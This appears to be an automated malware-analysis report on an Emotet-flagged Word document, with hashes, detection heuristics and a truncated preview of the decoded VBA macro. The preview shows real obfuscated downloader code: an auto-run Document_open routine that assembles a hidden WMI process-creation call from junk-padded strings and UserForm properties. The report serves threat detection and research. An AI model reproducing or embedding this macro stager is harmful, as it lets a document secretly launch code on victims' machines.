Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5617c4abba5374ab…

MALICIOUS

Office (OLE)

171.8 KB Created: 2020-08-18 06:39:00 Authoring application: Microsoft Office Word First seen: 2020-09-07
MD5: 306acea16547aa69c4375ba0c4fb18b9 SHA-1: 24923fb896724bfe93154d34aef72b55631119ea SHA-256: 5617c4abba5374abe1882c0e5903f2c0c83a8ddbed90d1cbf65ab00a08b8946c
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-9372916-0'. Static analysis revealed VBA macros, including a Document_Open macro and a hidden-property command stager utilizing CreateObject. These elements strongly suggest the macro's purpose is to download and execute a secondary payload, a common Emotet distribution technique. The presence of VBA macros and the Emotet detection signature point to this family.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-9372916-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-9372916-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11534 bytes
SHA-256: 9d1a3355898b992a4c35c27b0382f9602f63e0036685c33f5b8878a33e588bac
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Fyzym75b7hm45qgn3p"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Tg9idz07p_m943cbc5.V4ylinm9q5se6_egfl
End Sub


Attribute VB_Name = "Tg9idz07p_m943cbc5"
Attribute VB_Base = "0{E258942A-B2FC-4483-84AB-5DDF46D8232E}{270320ED-3906-4308-8B6B-5E90EA795001}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function V4ylinm9q5se6_egfl()
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 731
C89eiix8mtjkpv = 676
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Nv6d6ahhj55 = Tgd8lkm7mimlkiers_
Q0grkhwe_4gp0 = Tg9idz07p_m943cbc5.HelpContextId + 50 + 50
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 115
C89eiix8mtjkpv = 959
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Kd3vdoyw5on4_u = Tgd8lkm7mimlkiers_
Pyph_8o39snn3fd5g = ChrW(Q0grkhwe_4gp0 + (15))
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 351
C89eiix8mtjkpv = 456
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Ye5wt47_wyx4 = Tgd8lkm7mimlkiers_
Qar2m3o6egp1vg = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + Pyph_8o39snn3fd5g + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Tg9idz07p_m943cbc5.Wobcvj180_d6l7qkb + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 649
C89eiix8mtjkpv = 263
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Pt4cbeq58ere6 = Tgd8lkm7mimlkiers_
Sw0h6fdcc39nndue1 = Z5p8dqcf__ch2ea(Qar2m3o6egp1vg)
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 11
C89eiix8mtjkpv = 12
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
C_f56d7xekn65l1he = Tgd8lkm7mimlkiers_
Set Twzjjs4meynum6y9e0 = CreateObject(Sw0h6fdcc39nndue1)
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 13
C89eiix8mtjkpv = 165
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Licrkr7395shpp = Tgd8lkm7mimlkiers_
Jk7huwo7o8_g = Tg9idz07p_m943cbc5.Fmdzi4k13l3ywt.ControlTipText
   For Zq420
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.